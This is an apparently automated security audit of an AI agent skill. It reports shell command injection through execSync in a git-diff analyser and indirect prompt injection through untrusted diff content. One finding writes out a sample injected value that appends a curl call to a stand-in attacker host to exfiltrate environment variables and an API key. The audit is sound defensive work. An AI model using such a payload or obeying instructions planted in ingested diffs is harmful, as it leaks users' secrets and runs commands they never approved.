Gen Agent Trust Hub audit of skill: demo (skills/jaobrown/demo-changes/demo)

Result: Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGH
Findings: COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
  • COMMAND_EXECUTION (HIGH): The skill contains multiple instances of shell command injection vulnerabilities where user-provided strings are directly interpolated into execSync calls without sanitization.
  • In lib/analyze-diff.ts, the analyzeDiff function interpolates the commits parameter (provided via the MCP tool demo_analyze_changes) directly into a git diff command via a template literal: execSync(`git diff ${options.commits}`). An attacker could provide a value like HEAD; curl http://attacker.com/$(env | base64) to execute arbitrary commands and exfiltrate environment variables, including the ElevenLabs API key.
  • In lib/narrate.ts, execSync is used with ffprobe and ffmpeg on paths that can be influenced by tool inputs, providing further injection surfaces.
  • DATA_EXFILTRATION (MEDIUM): While the skill correctly uses environment variables for the ElevenLabs API key (ELEVEN_LABS_API_KEY), the command injection vulnerability in the git analysis logic allows an attacker to easily exfiltrate this key and other sensitive environment data from the host system.
  • PROMPT_INJECTION (LOW): The skill is vulnerable to indirect prompt injection (Category 8).
  • Ingestion points: The skill ingests untrusted code and text from git diffs in lib/analyze-diff.ts to identify UI changes and extract text for narration.
  • Boundary markers: There are no explicit delimiters or instructions to the LLM to ignore instructions embedded within the diff content when generating tests or scripts.
  • Capability inventory: The skill generates and executes Playwright tests and performs shell operations via execSync and spawn.
  • Sanitization: The extractChangedCopy function uses basic length and keyword filters but does not sanitize the text against adversarial LLM instructions.
  • EXTERNAL_DOWNLOADS (SAFE): The skill utilizes the ElevenLabs API for narration and expects ffmpeg to be installed locally. These are well-known, trustworthy external dependencies required for the skill's stated purpose.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Feb 17, 2026, 06:22 PM